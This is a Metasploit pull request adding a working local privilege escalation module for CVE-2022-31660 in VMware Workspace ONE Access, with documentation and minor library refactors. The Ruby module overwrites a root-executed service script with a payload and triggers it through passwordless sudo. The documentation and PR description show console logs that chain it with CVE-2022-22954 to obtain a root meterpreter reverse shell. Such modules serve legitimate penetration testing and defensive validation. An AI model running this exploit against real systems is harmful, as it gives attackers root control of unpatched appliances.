### PR TITLE
Add CVE-2022-31660 VMware Workspace ONE Access LPE

### DIFF
--- a/documentation/modules/exploit/linux/local/vmware_workspace_one_access_certproxy_lpe.md
+++ b/documentation/modules/exploit/linux/local/vmware_workspace_one_access_certproxy_lpe.md
@@ -1,0 +1,117 @@
+## Vulnerable Application
+VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of
+the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control
+is permitted via the sudo configuration without a password.
+
+### Setup
+
+To exploit this vulnerability in conjunction with CVE-2022-22954, follow [Installing and Configuring VMware Workspace
+ONE Access] or simply import the OVA into a **VMware hypervisor**. The target should be vulnerable to both
+vulnerabilities out of the box.
+
+The HW-150533, HW-154129, and HW-156875 patches may be optionally applied. In this case, a session will need to be
+opened by some means to the appliance as the `horizon` user in order to be exploitable. This is most easily accomplished
+by [resetting the root password], logging in locally, and then configuring SSH. Patches can be obtained from [VMware's
+Website]. Steps to reset the `root` password are available [here].
+
+[Installing and Configuring VMware Workspace ONE Access]: https://docs.vmware.com/en/VMware-Workspace-ONE-Access/21.08/workspace_one_access_install/GUID-0FABD001-050B-4A54-B100-2FA4E8F55613.html
+[VMware's Website]: https://customerconnect.vmware.com/en/downloads/details?downloadGroup=WS1A_ONPREM_210801&productId=1192&rPId=79985
+[resetting the root password]: https://kb.vmware.com/s/article/76530
+
+## Verification Steps
+
+1. Setup a vulnerable VMware instance (see the steps above).
+2. Start msfconsole.
+3. Obtain a session on the vulnerable instance.
+    * It is recommend to use either `exploit/linux/http/vmware_workspace_one_access_cve_2022_22954` if the target is
+      vulnerable to it or, alternatively, `exploit/multi/ssh/sshexec`.
+4. Do: `set SESSION -1`
+5. Optionally set the PAYLOAD and related options.
+6. Do: `run`
+7. If the target is vulnerable, the payload should be executed.
+
+## Options
+
+## Scenarios
+
+### VMware Workspace ONE Access 21.08.0.1
+In the following scenario, initial access is gained by first exploiting CVE-2022-22954. Once the session is opened, it
+is elevated to root by exploiting CVE-2022-31660.
+
+```
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options 
+
+Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.98   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (40132 bytes) to 192.168.159.98
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400
+
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: horizon
+meterpreter > background 
+[*] Backgrounding session 1...
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe 
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
+SESSION => -1
+msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Backing up the original file...
+[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
+[*] Triggering the payload...
+[*] Sending stage (40132 bytes) to 192.168.250.237
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
+[*] Restoring file contents...
+[*] Restoring file permissions...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```

--- a/lib/msf/core/post/file.rb
+++ b/lib/msf/core/post/file.rb
@@ -251,7 +251,7 @@ module Msf::Post::File
     end
     raise "`writable?' method does not support Windows systems" if session.platform == 'windows'
 
-    cmd_exec("test -w '#{path}' && echo true").to_s.include? 'true'
+    cmd_exec("(test -w '#{path}' || test -O '#{path}') && echo true").to_s.include? 'true'
   end
 
   #

--- a/lib/msf/core/post/linux/system.rb
+++ b/lib/msf/core/post/linux/system.rb
@@ -211,14 +211,6 @@ module System
   end
 
   #
-  # Gets the pid of the current session
-  # @return [String]
-  #
-  def get_session_pid
-    cmd_exec("echo $PPID").to_s
-  end
-
-  #
   # Checks if the system has gcc installed
   # @return [Boolean]
   #

--- a/lib/msf/core/post/unix.rb
+++ b/lib/msf/core/post/unix.rb
@@ -11,6 +11,14 @@ module Msf::Post::Unix
   end
 
   #
+  # Gets the pid of the current session
+  # @return [String]
+  #
+  def get_session_pid
+    cmd_exec("echo $PPID").to_s
+  end
+
+  #
   # Returns an array of hashes each representing a user
   # Keys are name, uid, gid, info, dir and shell
   #
@@ -99,7 +107,7 @@ module Msf::Post::Unix
   #
   def whoami
     shellpid = get_session_pid()
-    status = read_file("/proc/#{shellpid}/status") 
+    status = read_file("/proc/#{shellpid}/status")
     status.each_line do |line|
       split = line.split(":")
       if split[0] == "Uid"

--- a/modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb
+++ b/modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb
@@ -80,11 +80,11 @@ class MetasploitModule < Msf::Exploit::Local
 
     token = Rex::Text.rand_text_alpha(10)
     unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)
-      return CheckCode::Safe('Can not invoke the service control script with sudo.')
+      return CheckCode::Safe('Cannot invoke the service control script with sudo.')
     end
 
     unless writable?(TARGET_FILE)
-      return CheckCode::Safe('Can not write to the service file.')
+      return CheckCode::Safe('Cannot write to the service file.')
     end
 
     CheckCode::Appears

--- a/modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb
+++ b/modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
       update_info(
         info,
         {
-          'Name' => 'VMware Workspace ONE Access CVE-2022-####',
+          'Name' => 'VMware Workspace ONE Access CVE-2022-31660',
           'Description' => %q{
             VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges
             to those of the root user by modifying a file and then restarting the vmware-certproxy service which
@@ -40,8 +40,10 @@ class MetasploitModule < Msf::Exploit::Local
           'Privileged' => true,
           'DefaultTarget' => 0,
           'References' => [
+            [ 'CVE', '2022-31660' ],
+            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]
           ],
-          'DisclosureDate' => '',
+          'DisclosureDate' => '2022-08-02',
           'Notes' => {
             # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service
             # is disabled by default though.

--- a/modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb
+++ b/modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb
@@ -1,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => 'VMware Workspace ONE Access CVE-2022-####',
+          'Description' => %q{
+            VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges
+            to those of the root user by modifying a file and then restarting the vmware-certproxy service which
+            invokes it. The service control is permitted via the sudo configuration without a password.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Spencer McIntyre'
+          ],
+          'Platform' => [ 'linux', 'unix' ],
+          'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+          'SessionTypes' => ['shell', 'meterpreter'],
+          'Targets' => [
+            [ 'Automatic', {} ],
+          ],
+          'DefaultOptions' => {
+            'PrependFork' => true,
+            'MeterpreterTryToFork' => true
+          },
+          'Privileged' => true,
+          'DefaultTarget' => 0,
+          'References' => [
+          ],
+          'DisclosureDate' => '',
+          'Notes' => {
+            # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service
+            # is disabled by default though.
+            'Stability' => [CRASH_SERVICE_DOWN],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => [ARTIFACTS_ON_DISK]
+          }
+        }
+      )
+    )
+  end
+
+  def certproxy_service
+    # this script's location depends on the version, so find it.
+    return @certproxy_service if @certproxy_service
+
+    @certproxy_service = [
+      '/usr/local/horizon/scripts/certproxyService.sh',
+      '/opt/vmware/certproxy/bin/certproxyService.sh'
+    ].find { |path| file?(path) }
+
+    vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service
+    @certproxy_service
+  end
+
+  def sudo(arguments)
+    cmd_exec("sudo --non-interactive #{arguments}")
+  end
+
+  def check
+    unless whoami == 'horizon'
+      return CheckCode::Safe('Not running as the horizon user.')
+    end
+
+    token = Rex::Text.rand_text_alpha(10)
+    unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)
+      return CheckCode::Safe('Can not invoke the service control script with sudo.')
+    end
+
+    unless writable?(TARGET_FILE)
+      return CheckCode::Safe('Can not write to the service file.')
+    end
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    # backup the original permissions and contents
+    print_status('Backing up the original file...')
+    @backup = {
+      stat: stat(TARGET_FILE),
+      contents: read_file(TARGET_FILE)
+    }
+
+    if payload.arch.first == ARCH_CMD
+      payload_data = "#!/bin/bash\n#{payload.encoded}"
+    else
+      payload_data = generate_payload_exe
+    end
+    upload_and_chmodx(TARGET_FILE, payload_data)
+    print_status('Triggering the payload...')
+    sudo("--background #{certproxy_service} restart")
+  end
+
+  def cleanup
+    return unless @backup
+
+    print_status('Restoring file contents...')
+    file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it
+    write_file(TARGET_FILE, @backup[:contents])
+    print_status('Restoring file permissions...')
+    chmod(TARGET_FILE, @backup[:stat].mode & 0o777)
+  end
+end

--- a/modules/post/multi/recon/sudo_commands.rb
+++ b/modules/post/multi/recon/sudo_commands.rb
@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Post
       end
     end
   rescue => e
-    print_error "Could not parse sudo ouput: #{e.message}"
+    print_error "Could not parse sudo output: #{e.message}"
   end
 
   def run


### PR DESCRIPTION
This module exploits an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the `/opt/vmware/certproxy/bin/cert-proxy.sh` script is writable by the `horizon` user who can also indirectly execute it by invoking the `certproxyService.sh` script via sudo which is permitted without a password. The result is code execution as the root user, allowing `horizon` to elevate their privileges. This is notably valuable when a session has been obtained by the `horizon` user after successfully exploiting CVE-2022-22954 (`exploit/linux/http/vmware_workspace_one_access_cve_2022_22954`).

The file that is corrupted is first backed up and then restored after exploitation. If this were to fail, then the certproxy service would fail to run, but it's disabled by default anyways. The service being disabled does not affect exploitability at all.

Depending on the target's patch level, the `certproxyService.sh` script will exist in one of the following two locations. The module will automatically detect this.

* `/usr/local/horizon/scripts/certproxyService.sh`
* `/opt/vmware/certproxy/bin/certproxyService.sh`

This module has been tested successfully against

* v21.08.0.1 Build 19010796 (also vulnerable to CVE-2022-22954)
* v21.08.0.1 (*not* vulnerable to CVE-2022-22954, has patches HW-150533, HW-154129, and HW-156875 applied, ie fully patched as of May 25th)

## Verification

There are not datastore options that need to be set other than the `SESSION` and `LHOST` for the default payload.

- [x] Setup a vulnerable VMware instance (see the steps above).
- [x] Start msfconsole.
- [x] Obtain a session on the vulnerable instance.
    * It is recommend to use either `exploit/linux/http/vmware_workspace_one_access_cve_2022_22954` if the target is
      vulnerable to it or, alternatively, `exploit/multi/ssh/sshexec`.
- [x] Do: `set SESSION -1`
- [x] Optionally set the PAYLOAD and related options.
- [x] Do: `run`
- [x] If the target is vulnerable, the payload should be executed.

In the following scenario, initial access is gained by first exploiting CVE-2022-22954. Once the session is opened, it
is elevated to root by exploiting CVE-2022-31660.

```
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options 

Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.98   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      443              yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (40132 bytes) to 192.168.159.98
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400

meterpreter > sysinfo
Computer        : photon-machine
OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: horizon
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
SESSION => -1
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Backing up the original file...
[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
[*] Triggering the payload...
[*] Sending stage (40132 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
[*] Restoring file contents...
[*] Restoring file permissions...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : photon-machine
OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 
```
